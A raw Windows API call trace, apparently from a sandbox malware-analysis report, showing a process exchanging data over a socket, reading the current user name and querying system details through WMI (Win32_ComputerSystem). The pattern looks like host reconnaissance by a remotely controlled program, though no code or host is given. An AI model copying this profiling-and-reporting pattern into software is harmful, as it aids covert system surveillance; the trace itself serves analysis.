	[0197.670] LsaFreeMemory (Buffer=0x1b86a020) returned 0x0
	[0197.671] send (s=0x408, buf=0x2f79358*, len=49, flags=0) returned 49
	[0197.671] recv (in: s=0x408, buf=0x2f36688, len=502, flags=0 | out: buf=0x2f36688*) returned 91
	[0198.627] VirtualQuery (in: lpAddress=0x1c68c8a0, lpBuffer=0x1c68d760, dwLength=0x30 | out: lpBuffer=0x1c68d760*(BaseAddress=0x1c68c000, AllocationBase=0x1bd00000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0198.634] CoTaskMemAlloc (cb=0x204) returned 0x1b844760
	[0198.634] GetUserNameW (in: lpBuffer=0x1b844760, pcbBuffer=0x1c68cfd8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x1c68cfd8) returned 1
	[0198.635] CoTaskMemFree (pv=0x1b844760) 
	[0198.635] send (s=0x408, buf=0x2f8b1c0*, len=43, flags=0) returned 43
	[0198.636] recv (in: s=0x408, buf=0x2f36688, len=502, flags=0 | out: buf=0x2f36688*) returned 108
	[0199.634] VirtualQuery (in: lpAddress=0x1c68c8a0, lpBuffer=0x1c68d760, dwLength=0x30 | out: lpBuffer=0x1c68d760*(BaseAddress=0x1c68c000, AllocationBase=0x1bd00000, AllocationProtect=0x4, __alignment1=0xfffffa80, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0199.642] CoGetObjectContext (in: riid=0x1c68cbb8*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68cbb0 | out: ppv=0x1c68cbb0*=0x221868) returned 0x0
	[0199.642] IComThreadingInfo:GetCurrentApartmentType (in: This=0x221868, pAptType=0x1c68cbd0 | out: pAptType=0x1c68cbd0*=1) returned 0x0
	[0199.642] IUnknown:QueryInterface (in: This=0x221868, riid=0x2efe148*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c68ccd8 | out: ppvObject=0x1c68ccd8*=0x0) returned 0x80004002
	[0199.642] IUnknown:Release (This=0x221868) returned 0x1
	[0199.643] CoGetClassObject (in: rclsid=0x2756a8*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68c240 | out: ppv=0x1c68c240*=0x1cc31980) returned 0x0
	[0199.643] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc31980, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68bf50 | out: ppvObject=0x1c68bf50*=0x0) returned 0x80004002
	[0199.643] WbemDefPath:IClassFactory:CreateInstance (in: This=0x1cc31980, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bf38 | out: ppvObject=0x1c68bf38*=0x1cc38280) returned 0x0
	[0199.643] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc38280, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68be40 | out: ppvObject=0x1c68be40*=0x1cc38280) returned 0x0
	[0199.644] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc38280, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68bec0 | out: ppvObject=0x1c68bec0*=0x0) returned 0x80004002
	[0199.644] WbemDefPath:IUnknown:AddRef (This=0x1cc38280) returned 0x3
	[0199.644] CoGetContextToken (in: pToken=0x1c68bb10 | out: pToken=0x1c68bb10) returned 0x0
	[0199.644] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc38280, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bad0 | out: ppvObject=0x1c68bad0*=0x1b886c70) returned 0x0
	[0199.644] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x1b886c70, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68bb00 | out: pCid=0x1c68bb00*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0199.644] WbemDefPath:IUnknown:Release (This=0x1b886c70) returned 0x3
	[0199.645] CoGetContextToken (in: pToken=0x1c68bae0 | out: pToken=0x1c68bae0) returned 0x0
	[0199.645] WbemDefPath:IUnknown:AddRef (This=0x1cc38280) returned 0x4
	[0199.645] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc38280, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bbf8 | out: ppvObject=0x1c68bbf8*=0x0) returned 0x80004002
	[0199.645] WbemDefPath:IUnknown:Release (This=0x1cc38280) returned 0x3
	[0199.645] WbemDefPath:IUnknown:Release (This=0x1cc38280) returned 0x2
	[0199.645] WbemDefPath:IUnknown:Release (This=0x1cc31980) returned 0x0
	[0199.645] WbemDefPath:IUnknown:Release (This=0x1cc38280) returned 0x1
	[0199.645] CoGetContextToken (in: pToken=0x1c68c810 | out: pToken=0x1c68c810) returned 0x0
	[0199.645] CoGetContextToken (in: pToken=0x1c68c750 | out: pToken=0x1c68c750) returned 0x0
	[0199.645] WbemDefPath:IUnknown:AddRef (This=0x1cc38280) returned 0x2
	[0199.646] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc38280, riid=0x1c68c890*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c68c870 | out: ppvObject=0x1c68c870*=0x1cc38280) returned 0x0
	[0199.646] WbemDefPath:IUnknown:Release (This=0x1cc38280) returned 0x2
	[0199.646] WbemDefPath:IUnknown:Release (This=0x1cc38280) returned 0x1
	[0199.646] CoGetContextToken (in: pToken=0x1c68c990 | out: pToken=0x1c68c990) returned 0x0
	[0199.646] CoGetContextToken (in: pToken=0x1c68c8d0 | out: pToken=0x1c68c8d0) returned 0x0
	[0199.646] WbemDefPath:IUnknown:AddRef (This=0x1cc38280) returned 0x2
	[0199.646] WbemDefPath:IUnknown:QueryInterface (in: This=0x1cc38280, riid=0x1c68ca10*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x1c68c9f0 | out: ppvObject=0x1c68c9f0*=0x1cc38280) returned 0x0
	[0199.646] WbemDefPath:IUnknown:Release (This=0x1cc38280) returned 0x2
	[0199.646] WbemDefPath:IUnknown:AddRef (This=0x1cc38280) returned 0x3
	[0199.647] WbemDefPath:IWbemPath:SetText (This=0x1cc38280, uMode=0x4, pszPath="\\\\localhost\\root\\cimv2") returned 0x0
	[0199.647] WbemDefPath:IUnknown:Release (This=0x1cc38280) returned 0x2
	[0199.647] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc38280, puCount=0x1c68cca0 | out: puCount=0x1c68cca0*=0x2) returned 0x0
	[0199.647] WbemDefPath:IWbemPath:GetText (in: This=0x1cc38280, lFlags=4, puBuffLength=0x1c68cca0*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cca0*=0x17, pszText=0x0) returned 0x0
	[0199.647] WbemDefPath:IWbemPath:GetText (in: This=0x1cc38280, lFlags=4, puBuffLength=0x1c68cca0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cca0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0199.647] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc38280, puCount=0x1c68cc50 | out: puCount=0x1c68cc50*=0x2) returned 0x0
	[0199.647] WbemDefPath:IWbemPath:GetText (in: This=0x1cc38280, lFlags=4, puBuffLength=0x1c68cc50*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cc50*=0x17, pszText=0x0) returned 0x0
	[0199.647] WbemDefPath:IWbemPath:GetText (in: This=0x1cc38280, lFlags=4, puBuffLength=0x1c68cc50*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cc50*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0199.647] CoGetObjectContext (in: riid=0x1c68cb88*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68cb80 | out: ppv=0x1c68cb80*=0x221868) returned 0x0
	[0199.647] IComThreadingInfo:GetCurrentApartmentType (in: This=0x221868, pAptType=0x1c68cba0 | out: pAptType=0x1c68cba0*=1) returned 0x0
	[0199.647] IUnknown:QueryInterface (in: This=0x221868, riid=0x2efe148*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x1c68cca8 | out: ppvObject=0x1c68cca8*=0x0) returned 0x80004002
	[0199.647] IUnknown:Release (This=0x221868) returned 0x1
	[0199.647] CoGetClassObject (in: rclsid=0x1b8749f8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef322d250*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x1c68c830 | out: ppv=0x1c68c830*=0x1cc31a20) returned 0x0
	[0199.648] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc31a20, riid=0x7fef322d2d0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68c540 | out: ppvObject=0x1c68c540*=0x0) returned 0x80004002
	[0199.648] WbemLocator:IClassFactory:CreateInstance (in: This=0x1cc31a20, pUnkOuter=0x0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c528 | out: ppvObject=0x1c68c528*=0x1cc31a40) returned 0x0
	[0199.648] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc31a40, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c430 | out: ppvObject=0x1c68c430*=0x1cc31a40) returned 0x0
	[0199.648] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc31a40, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c4b0 | out: ppvObject=0x1c68c4b0*=0x0) returned 0x80004002
	[0199.649] WbemLocator:IUnknown:AddRef (This=0x1cc31a40) returned 0x3
	[0199.649] CoGetContextToken (in: pToken=0x1c68c100 | out: pToken=0x1c68c100) returned 0x0
	[0199.649] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc31a40, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c0c0 | out: ppvObject=0x1c68c0c0*=0x0) returned 0x80004002
	[0199.649] CoGetContextToken (in: pToken=0x1c68c0d0 | out: pToken=0x1c68c0d0) returned 0x0
	[0199.649] WbemLocator:IUnknown:AddRef (This=0x1cc31a40) returned 0x4
	[0199.649] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc31a40, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c1e8 | out: ppvObject=0x1c68c1e8*=0x0) returned 0x80004002
	[0199.649] WbemLocator:IUnknown:Release (This=0x1cc31a40) returned 0x3
	[0199.649] WbemLocator:IUnknown:Release (This=0x1cc31a40) returned 0x2
	[0199.650] WbemLocator:IUnknown:Release (This=0x1cc31a20) returned 0x0
	[0199.650] WbemLocator:IUnknown:Release (This=0x1cc31a40) returned 0x1
	[0199.650] CoGetContextToken (in: pToken=0x1c68c6f0 | out: pToken=0x1c68c6f0) returned 0x0
	[0199.650] CoGetContextToken (in: pToken=0x1c68c630 | out: pToken=0x1c68c630) returned 0x0
	[0199.650] WbemLocator:IUnknown:AddRef (This=0x1cc31a40) returned 0x2
	[0199.650] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc31a40, riid=0x1c68c770*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x1c68c750 | out: ppvObject=0x1c68c750*=0x1cc31a40) returned 0x0
	[0199.650] WbemLocator:IUnknown:Release (This=0x1cc31a40) returned 0x2
	[0199.650] WbemLocator:IUnknown:Release (This=0x1cc31a40) returned 0x1
	[0199.650] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x1cc38280, puCount=0x1c68cb50 | out: puCount=0x1c68cb50*=0x2) returned 0x0
	[0199.650] WbemDefPath:IWbemPath:GetText (in: This=0x1cc38280, lFlags=8, puBuffLength=0x1c68cb50*=0x0, pszText=0x0 | out: puBuffLength=0x1c68cb50*=0x17, pszText=0x0) returned 0x0
	[0199.651] WbemDefPath:IWbemPath:GetText (in: This=0x1cc38280, lFlags=8, puBuffLength=0x1c68cb50*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x1c68cb50*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0199.651] CoCreateInstance (in: rclsid=0x642ffff15a8*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x642ffff14d8*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x1c68c840 | out: ppv=0x1c68c840*=0x1cc31a60) returned 0x0
	[0199.651] WbemLocator:IWbemLocator:ConnectServer (in: This=0x1cc31a60, strNetworkResource="\\\\localhost\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x1c68cad0 | out: ppNamespace=0x1c68cad0*=0x1cc3a6e8) returned 0x0
	[0200.559] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3a6e8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c6b8 | out: ppvObject=0x1c68c6b8*=0x1b86e3a0) returned 0x0
	[0200.559] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x1b86e3a0, pProxy=0x1cc3a6e8, pAuthnSvc=0x1c68c6b0, pAuthzSvc=0x1c68c6ac, pServerPrincName=0x1c68c6d8, pAuthnLevel=0x1c68c6a8, pImpLevel=0x1c68c6c4, pAuthInfo=0x1c68c6e8, pCapabilites=0x1c68c6c0 | out: pAuthnSvc=0x1c68c6b0*=0xa, pAuthzSvc=0x1c68c6ac*=0x0, pServerPrincName=0x1c68c6d8, pAuthnLevel=0x1c68c6a8*=0x6, pImpLevel=0x1c68c6c4*=0x2, pAuthInfo=0x1c68c6e8, pCapabilites=0x1c68c6c0*=0x1) returned 0x0
	[0200.559] WbemLocator:IUnknown:Release (This=0x1b86e3a0) returned 0x1
	[0200.559] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3a6e8, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c658 | out: ppvObject=0x1c68c658*=0x1b86e3e0) returned 0x0
	[0200.559] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3a6e8, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c5e8 | out: ppvObject=0x1c68c5e8*=0x1b86e3a0) returned 0x0
	[0200.560] WbemLocator:IClientSecurity:SetBlanket (This=0x1b86e3a0, pProxy=0x1cc3a6e8, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0200.560] WbemLocator:IUnknown:Release (This=0x1b86e3a0) returned 0x2
	[0200.560] WbemLocator:IUnknown:Release (This=0x1b86e3e0) returned 0x1
	[0200.560] CoTaskMemFree (pv=0x1b885ad0) 
	[0200.560] WbemLocator:IUnknown:Release (This=0x1cc31a60) returned 0x0
	[0200.560] WbemLocator:IUnknown:QueryInterface (in: This=0x1cc3a6e8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c2d0 | out: ppvObject=0x1c68c2d0*=0x1b86e3e0) returned 0x0
	[0200.561] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e3e0, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c350 | out: ppvObject=0x1c68c350*=0x0) returned 0x80004002
	[0200.561] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e3e0, riid=0x7fef322d2c0*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x1c68c0e8 | out: ppvObject=0x1c68c0e8*=0x0) returned 0x80004002
	[0200.562] WbemLocator:IUnknown:AddRef (This=0x1b86e3e0) returned 0x3
	[0200.562] CoGetContextToken (in: pToken=0x1c68bfa0 | out: pToken=0x1c68bfa0) returned 0x0
	[0200.562] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e3e0, riid=0x7fef322d2b0*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68bf60 | out: ppvObject=0x1c68bf60*=0x1b86e2c8) returned 0x0
	[0200.563] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x1b86e2c8, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x1c68bf90 | out: pCid=0x1c68bf90*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0200.563] WbemLocator:IUnknown:Release (This=0x1b86e2c8) returned 0x3
	[0200.563] CoGetContextToken (in: pToken=0x1c68bf70 | out: pToken=0x1c68bf70) returned 0x0
	[0200.563] WbemLocator:IUnknown:AddRef (This=0x1b86e3e0) returned 0x4
	[0200.563] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e3e0, riid=0x7fef322d280*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c088 | out: ppvObject=0x1c68c088*=0x1b86e3b0) returned 0x0
	[0200.563] WbemLocator:IUnknown:Release (This=0x1b86e3e0) returned 0x4
	[0200.563] WbemLocator:IRpcOptions:Query (in: This=0x1b86e3b0, pPrx=0x1b86e3e0, dwProperty=2, pdwValue=0x1c68c0f8 | out: pdwValue=0x1c68c0f8) returned 0x80004002
	[0200.564] WbemLocator:IUnknown:Release (This=0x1b86e3b0) returned 0x3
	[0200.564] WbemLocator:IUnknown:Release (This=0x1b86e3e0) returned 0x2
	[0200.564] CoGetContextToken (in: pToken=0x1c68c470 | out: pToken=0x1c68c470) returned 0x0
	[0200.564] CoGetContextToken (in: pToken=0x1c68c3b0 | out: pToken=0x1c68c3b0) returned 0x0
	[0200.564] WbemLocator:IUnknown:AddRef (This=0x1b86e3e0) returned 0x3
	[0200.564] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e3e0, riid=0x1c68c4f0*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c68c4d0 | out: ppvObject=0x1c68c4d0*=0x1cc3a6e8) returned 0x0
	[0200.564] WbemLocator:IUnknown:Release (This=0x1b86e3e0) returned 0x3
	[0200.565] WbemLocator:IUnknown:Release (This=0x1cc3a6e8) returned 0x2
	[0200.565] WbemLocator:IUnknown:Release (This=0x1cc3a6e8) returned 0x1
	[0200.565] CoGetContextToken (in: pToken=0x1c68ca70 | out: pToken=0x1c68ca70) returned 0x0
	[0200.565] WbemLocator:IUnknown:AddRef (This=0x1b86e3e0) returned 0x2
	[0200.565] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e3e0, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c640 | out: ppvObject=0x1c68c640*=0x1b86e3e0) returned 0x0
	[0200.566] WbemLocator:IUnknown:Release (This=0x1b86e3e0) returned 0x2
	[0200.566] WbemLocator:IUnknown:Release (This=0x1b86e3e0) returned 0x1
	[0200.566] CoGetContextToken (in: pToken=0x1c68c710 | out: pToken=0x1c68c710) returned 0x0
	[0200.566] CoGetContextToken (in: pToken=0x1c68c650 | out: pToken=0x1c68c650) returned 0x0
	[0200.566] WbemLocator:IUnknown:AddRef (This=0x1b86e3e0) returned 0x2
	[0200.566] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e3e0, riid=0x1c68c790*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x1c68c770 | out: ppvObject=0x1c68c770*=0x1cc3a6e8) returned 0x0
	[0200.567] WbemLocator:IUnknown:Release (This=0x1b86e3e0) returned 0x2
	[0200.567] WbemLocator:IUnknown:AddRef (This=0x1cc3a6e8) returned 0x3
	[0200.567] IWbemServices:ExecQuery (in: This=0x1cc3a6e8, strQueryLanguage="WQL", strQuery="select * from Win32_ComputerSystem", lFlags=16, pCtx=0x0, ppEnum=0x1c68cc08 | out: ppEnum=0x1c68cc08*=0x1cc3c728) returned 0x0
	[0200.575] IUnknown:QueryInterface (in: This=0x1cc3c728, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c818 | out: ppvObject=0x1c68c818*=0x1cc3c730) returned 0x0
	[0200.575] IClientSecurity:QueryBlanket (in: This=0x1cc3c730, pProxy=0x1cc3c728, pAuthnSvc=0x1c68c810, pAuthzSvc=0x1c68c80c, pServerPrincName=0x1c68c838, pAuthnLevel=0x1c68c808, pImpLevel=0x1c68c824, pAuthInfo=0x1c68c848, pCapabilites=0x1c68c820 | out: pAuthnSvc=0x1c68c810*=0xa, pAuthzSvc=0x1c68c80c*=0x0, pServerPrincName=0x1c68c838, pAuthnLevel=0x1c68c808*=0x6, pImpLevel=0x1c68c824*=0x2, pAuthInfo=0x1c68c848, pCapabilites=0x1c68c820*=0x1) returned 0x0
	[0200.575] IUnknown:Release (This=0x1cc3c730) returned 0x1
	[0200.575] IUnknown:QueryInterface (in: This=0x1cc3c728, riid=0x642ffff1458*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c7b8 | out: ppvObject=0x1c68c7b8*=0x1b86e260) returned 0x0
	[0200.575] IUnknown:QueryInterface (in: This=0x1cc3c728, riid=0x642ffff1468*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c748 | out: ppvObject=0x1c68c748*=0x1cc3c730) returned 0x0
	[0200.575] IClientSecurity:SetBlanket (This=0x1cc3c730, pProxy=0x1cc3c728, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0200.577] IUnknown:Release (This=0x1cc3c730) returned 0x2
	[0200.577] WbemLocator:IUnknown:Release (This=0x1b86e260) returned 0x1
	[0200.577] CoTaskMemFree (pv=0x1b885c20) 
	[0200.578] IUnknown:QueryInterface (in: This=0x1cc3c728, riid=0x7fef322d260*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x1c68c3f0 | out: ppvObject=0x1c68c3f0*=0x1b86e260) returned 0x0
	[0200.578] WbemLocator:IUnknown:QueryInterface (in: This=0x1b86e260, riid=0x7fef322d850*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x1c68c470 | out: ppvObject=0x1c68c470*=0x0) returned 0x80004002
